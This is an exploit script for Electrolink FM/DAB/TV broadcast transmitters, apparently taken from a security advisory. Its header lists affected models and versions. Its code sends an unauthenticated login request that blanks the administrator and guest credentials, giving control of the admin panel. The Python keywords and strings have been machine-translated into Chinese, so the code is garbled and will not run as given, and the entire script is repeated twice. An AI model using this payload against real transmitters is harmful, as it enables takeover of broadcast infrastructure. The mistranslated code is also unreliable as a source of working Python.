#!/usr/bin/env Python
#
#
#Electolink FM/DAB/TV发送器远程身份验证去除
#
#
#vendor: Electolink S.R.L.
#产品网页: https://www.electrolink.com
#受影响的版本: 10W,100W,250W,紧凑型DAB发射器
#500W,1kW,2kW中型DAB发射器
#2.5kW,3kW,4kW,5kW高功率DAB发射器
#100W,500W,1kW,2kW紧凑型FM发射机
#3kW,5kW,10kW,15kW,20kW,30kW模块化FM发射器
#15W -40kW数字FM发射器
#BI,BIII VHF电视发射器
#10W -5KW UHF电视发射器
#Web版本: 01.09,01.08,01.07
#显示版本: 1.4,1.2
#控制单元版本: 01.06,01.04,01.03
#固件版本: 2.1
#
#自1990年以来的摘要: Electrolink一直在处理设计和
#广播和电视高级技术的制造
#广播。最全面的产品系列包括: FM
#发射器,DAB发射器,类似物的电视发射器和
#Digital多核心操作,带通滤波器(FM,DAB,ATV,
#DTV),频道组合者(FM,DAB,ATV,DTV),电动煤炭氧化
#开关,手动补丁面板,射频电表,刚性线和
# 配件。满足广播公司需求的专业解决方案
#从小型社区电视或广播到大型政府网络。
#
#紧凑型DAB发射器10W,100W和250W型号,具有3.5'
#触摸屏显示和最先进的DAB模块的内置状态,
#EDI输入和GPS接收器。所有发射器均配备
#最先进的DAB调制器,表现出色,
#自我保护和自我控制的放大器可确保无故障
#不间断操作。
#
#100W,500W,1kW和2kW功率范围可在紧凑型2U上使用,并且
#3U 19'帧。内置立体声编码器,触摸屏显示和
#有效的低噪声空气冷却系统。可用型号: 3kw,
#5kW,10kW,15kW,20kW和30kW。高效率FM发射器
#具有完全宽带固态放大器和有效的
#低噪声空气冷却系统。
#
#FM数字调制器具有出色的规格,内置的
#立体声和RDS编码器。数字装饰限制器以及
#ASI和SDI输入可用。这些发射器已经准备好
#对于等电网络。
#
#可用于VHF BI和VHF BIII运行
#以及用户友好的本地和遥控器。多标准UHF
#电视发射器从10W到5kW,有效的低噪声空气
#冷却系统。模拟PAL,NTSC和数字DVB-T/T2,ATSC
#和ISDB-TB可用。
#
#desc:该应用程序容易受到未经身份验证的攻击
#参数操作,允许攻击者设置
#凭借空白的凭据,使她可以访问管理面板。
#也容易受到帐户收购和任意密码的影响
# 改变。
#
#测试在: MBEDTHIS-APPWEB/12.5.0
#MBEDTHIS-APPWEB/12.0.0
#
#
#神经原质发现的脆弱性
#马其顿信息安全研究开发实验室
#零科学实验室-https://www.zeroscience.mk- @Zeroscience
#
#
#咨询ID: ZSL-2023-5792
#咨询url: https://www.zeroscience.mk/en/vulnerabilities/zsl-2023-5792.php
#
#
#30.06.2023
#
#
导入日期
导入请求
dt=dateTime.dateTime.now()
dt=dt.strftime('%d。%m。%y%h:%m:%s')
nul=''
打印(“启动发射机利用”,DT)
IP=输入('Enter发射器IP:')
如果“ http”不在ip:中
ip='http://' + ip
EP='/login.htm'
URL=IP + EP
签名={'Accept-编码':'GZIP,DEFLATE',
“接受语言” :'ku-mk,en; q=0.1806',
“用户代理” :'Broadcastso/b.b',
“连接” :'守护力'
}
#----------------------------------------------------------------------------------------------------------------------------------------------------------------
postd={'adminuser': nul,
'guestuser': nul,
“ AdminPassword” : NUL,
'GuestPassword': Nul
}
打印('删除安全控制.')
r=requests.post(url,data=postd,headers=签名)
如果r.status_code==200:
打印('完成。去和'登录'。')
其他:
打印('错误')
出口(-4)
#
#
#Electolink FM/DAB/TV发送器远程身份验证去除
#
#
#vendor: Electolink S.R.L.
#产品网页: https://www.electrolink.com
#受影响的版本: 10W,100W,250W,紧凑型DAB发射器
#500W,1kW,2kW中型DAB发射器
#2.5kW,3kW,4kW,5kW高功率DAB发射器
#100W,500W,1kW,2kW紧凑型FM发射机
#3kW,5kW,10kW,15kW,20kW,30kW模块化FM发射器
#15W -40kW数字FM发射器
#BI,BIII VHF电视发射器
#10W -5KW UHF电视发射器
#Web版本: 01.09,01.08,01.07
#显示版本: 1.4,1.2
#控制单元版本: 01.06,01.04,01.03
#固件版本: 2.1
#
#自1990年以来的摘要: Electrolink一直在处理设计和
#广播和电视高级技术的制造
#广播。最全面的产品系列包括: FM
#发射器,DAB发射器,类似物的电视发射器和
#Digital多核心操作,带通滤波器(FM,DAB,ATV,
#DTV),频道组合者(FM,DAB,ATV,DTV),电动煤炭氧化
#开关,手动补丁面板,射频电表,刚性线和
# 配件。满足广播公司需求的专业解决方案
#从小型社区电视或广播到大型政府网络。
#
#紧凑型DAB发射器10W,100W和250W型号,具有3.5'
#触摸屏显示和最先进的DAB模块的内置状态,
#EDI输入和GPS接收器。所有发射器均配备
#最先进的DAB调制器,表现出色,
#自我保护和自我控制的放大器可确保无故障
#不间断操作。
#
#100W,500W,1kW和2kW功率范围可在紧凑型2U上使用,并且
#3U 19'帧。内置立体声编码器,触摸屏显示和
#有效的低噪声空气冷却系统。可用型号: 3kw,
#5kW,10kW,15kW,20kW和30kW。高效率FM发射器
#具有完全宽带固态放大器和有效的
#低噪声空气冷却系统。
#
#FM数字调制器具有出色的规格,内置的
#立体声和RDS编码器。数字装饰限制器以及
#ASI和SDI输入可用。这些发射器已经准备好
#对于等电网络。
#
#可用于VHF BI和VHF BIII运行
#以及用户友好的本地和遥控器。多标准UHF
#电视发射器从10W到5kW,有效的低噪声空气
#冷却系统。模拟PAL,NTSC和数字DVB-T/T2,ATSC
#和ISDB-TB可用。
#
#desc:该应用程序容易受到未经身份验证的攻击
#参数操作,允许攻击者设置
#凭借空白的凭据,使她可以访问管理面板。
#也容易受到帐户收购和任意密码的影响
# 改变。
#
#测试在: MBEDTHIS-APPWEB/12.5.0
#MBEDTHIS-APPWEB/12.0.0
#
#
#神经原质发现的脆弱性
#马其顿信息安全研究开发实验室
#零科学实验室-https://www.zeroscience.mk- @Zeroscience
#
#
#咨询ID: ZSL-2023-5792
#咨询url: https://www.zeroscience.mk/en/vulnerabilities/zsl-2023-5792.php
#
#
#30.06.2023
#
#
导入日期
导入请求
dt=dateTime.dateTime.now()
dt=dt.strftime('%d。%m。%y%h:%m:%s')
nul=''
打印(“启动发射机利用”,DT)
IP=输入('Enter发射器IP:')
如果“ http”不在ip:中
ip='http://' + ip
EP='/login.htm'
URL=IP + EP
签名={'Accept-编码':'GZIP,DEFLATE',
“接受语言” :'ku-mk,en; q=0.1806',
“用户代理” :'Broadcastso/b.b',
“连接” :'守护力'
}
#----------------------------------------------------------------------------------------------------------------------------------------------------------------
postd={'adminuser': nul,
'guestuser': nul,
“ AdminPassword” : NUL,
'GuestPassword': Nul
}
打印('删除安全控制.')
r=requests.post(url,data=postd,headers=签名)
如果r.status_code==200:
打印('完成。去和'登录'。')
其他:
打印('错误')
出口(-4)